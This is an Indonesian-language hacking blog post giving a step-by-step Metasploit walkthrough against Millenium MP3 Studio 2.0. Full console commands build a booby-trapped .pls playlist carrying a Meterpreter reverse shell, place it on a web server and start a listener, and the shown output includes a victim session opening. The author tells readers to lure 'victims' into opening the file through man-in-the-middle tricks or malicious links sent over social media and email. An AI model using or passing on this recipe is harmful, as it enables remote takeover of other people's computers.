Metasploit VS Millenium MP3 Studio 2.0
Metasploit VS Millenium MP3 Studio 2.0
Preparation :
[*] Metasploit
[*] Apache2
Briefing :
[*] Buat file 0day untuk Millenium MP3 Studio 2.0
[*] Pindahkan file 0day ke directory /var/www/
[*] Tunggu hingga korban memainkan file 0day kita
[*] Game Over
Walkthrough:
1. Buat file 0day untuk Millenium MP3 Studio 2.0
Command :
msf > use exploit/windows/fileformat/millenium_mp3_plsKemudian, kita setting file 0day kita.
Command :
msf exploit(millenium_mp3_pls) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(millenium_mp3_pls) > set LHOST 172.16.230.1LHOST => 172.16.230.1msf exploit(millenium_mp3_pls) > set LPORT 4444LPORT => 4444msf exploit(millenium_mp3_pls) > set FILENAME listen-to-me.plsFILENAME => listen-to-me.plsmsf exploit(millenium_mp3_pls) > set EXITFUNC noneEXITFUNC => noneCek eksploit kita untuk memastikan tidak ada parameter yang kosong.
Command :
msf exploit(millenium_mp3_pls) > show options
Module options (exploit/windows/fileformat/millenium_mp3_pls): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME listen-to-me.pls yes The file name.Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC none yes Exit technique: seh, thread, process, none LHOST 172.16.230.1 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Windows UniversalKemudian masukan perintah exploit untuk membuat file 0day.
Command :
msf exploit(millenium_mp3_pls) > exploit
[*] Creating 'listen-to-me.pls' file ...[+] listen-to-me.pls stored at /root/.msf4/local/listen-to-me.plsOk. File kita sudah dibuat, dan di simpan di dalam direktori /root/.msf4/local/ bernama listen-to-me.pls
2. Pindahkan file listen-to-me.pls ke direktori /var/www
Gunakan perintah mv, atau cp untuk memindahkan file ini.
Command :
root@revolution:~# cp /root/.msf4/local/listen-to-me.pls /var/www/Kemudian cek kembali bahwa file kita sudah terpindah ke direktori /var/www/
Command :
root@revolution:~# cd /var/www/root@revolution:/var/www# lltotal 54680drwxr-xr-x 4 root root 4096 2012-01-08 14:05 ./drwxr-xr-x 16 root root 4096 2011-06-08 20:16 ../drwxr-xr-x 10 www-data www-data 4096 2012-01-07 19:36 beef/-rw-r--r-- 1 root root 8156634 2009-12-10 07:48 BigAntServer_Enu_Setup.exe-rwxrwxrwx 1 root root 7983311 2011-11-01 15:06 ca_setup.exe*-rw-r--r-- 1 root root 4160 2012-01-08 14:05 listen-to-me.pls-rwxrwxrwx 1 root root 1851184 2012-01-05 18:36 millennium.exe*-rw-r--r-- 1 root root 102476 2012-01-07 19:57 minishare-1.4.1.exe-rwxrwxrwx 1 root root 1269567 2011-12-27 16:51 Savant31.exe*-rwxrwxrwx 1 root root 17050136 2011-11-27 09:43 ServUSetup.exe*-rwxrwxrwx 1 root root 19541182 2011-11-01 15:05 wireshark-win32-1.6.2.exe*drwxr-xr-x 2 root root 4096 2011-05-10 14:44 wstool/Sekarang kita tunggu hingga seseorang mengabil file ini, kemudian mengeksekusinya dengan program Millenium MP3 Studio 2.0. Anda bisa menggunakan cara MITM atau mengirim malicious link kepada korban melalui jejaring social, atau email. Jangan lupa untuk mengaktifkan multi/handler pada metasploit.
Command :
msf exploit(millenium_mp3_pls) > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 172.16.230.1LHOST => 172.16.230.1msf exploit(handler) > set LPORT 4444LPORT => 4444Cek kembali exploit multi handler kita.
Command :
msf exploit(handler) > show options
Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 172.16.230.1 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Wildcard TargetKemudian exploit untuk menjalankan multi handler
Command :
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.230.1:4444 [*] Starting the payload handler...3. Korban masuk kedalam perangkap.
Dan ini yang akan terjadi ketika korban masuk ke dalam perangkap.
Command :
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.230.1:4444 [*] Starting the payload handler...[*] Sending stage (752128 bytes) to 172.16.230.128[*] Meterpreter session 1 opened (172.16.230.1:4444 -> 172.16.230.128:1187) at 2012-01-08 15:27:02 +0700meterpreter >Excellent like usual =)
About: jefri
You may also like...
Langganan:
Posting Komentar (Atom)
Recent Posts
Popular Posts
-
1.LOAD_FILE Load file adalah query SQL untuk meng-load suatu file scara remote..kurang lebihnya seperti itu ..
-
siap meluncur di tunggu dari kawan kawan untuk sharing bugs and scaning pake bot
-
Oke, untuk yang belum tau aja yhaa... ^^ Utk pengguna windoss, install dlu interpreter python, coz bhs ini ga default ada… (ckckck...
-
Ciuman adalah bahasa tubuh yang populer untuk mengungkapkan rasa sayang kepada pasangan, teman maupun keluarga. Tapi ada beberapa tipe...
-
Assalamu alaikum Sudah lama tidak posting blog nih disini saya akan membahas cara membuat program transaksi penjualan dengan Fox pro ...
-
Gambaran Web Attack : Scan => XPL/SQLi => Upload Shell => Deface/Jumping => Rooting 1. Scan Cari tau dimana letak kel...
-
Membuat payload dan mengirimnya kepada target dengan metode spear pishing attack adalah cara termudah dalam melakukan exploitasi. Nam...
-
assalamualaikummm permisi bang ane cuma mau share,.... gimana cara atau trik membuat Flashing screen ( atau layar menjadi kelap kelip,....)
-
Pada hari ini saya akan posting alur web attack buat yang mau blajar silahkan 1. Scan Cari tau dimana letak kelemahaan web target. bi...
-
jika kamu adalah seorang admin,webmaster di suatu website . . . pasti kamu ingin menangkalserangan ini...ane akan beri sedikit ...
Recent Comments
Labels
Labels
Find us on Facebook
Labels
- backtrack (47)
- berita (12)
- blogseo (6)
- education (1)
- foxpro (2)
- hacking (78)
- Ilmu Komputer (131)
- info unik (32)
- intim (12)
- kesehatan (23)
- lounge (4)
- love (11)
- network (1)
- Network-Linux (1)
- network-windows (1)
- olahraga (5)
- pascal (2)
- php (1)
- programer (29)
- relationship (23)
- sqljavascriptdll (7)
- Virus (1)
- webhacking (9)
- wifihack (8)






Tidak ada komentar:
Posting Komentar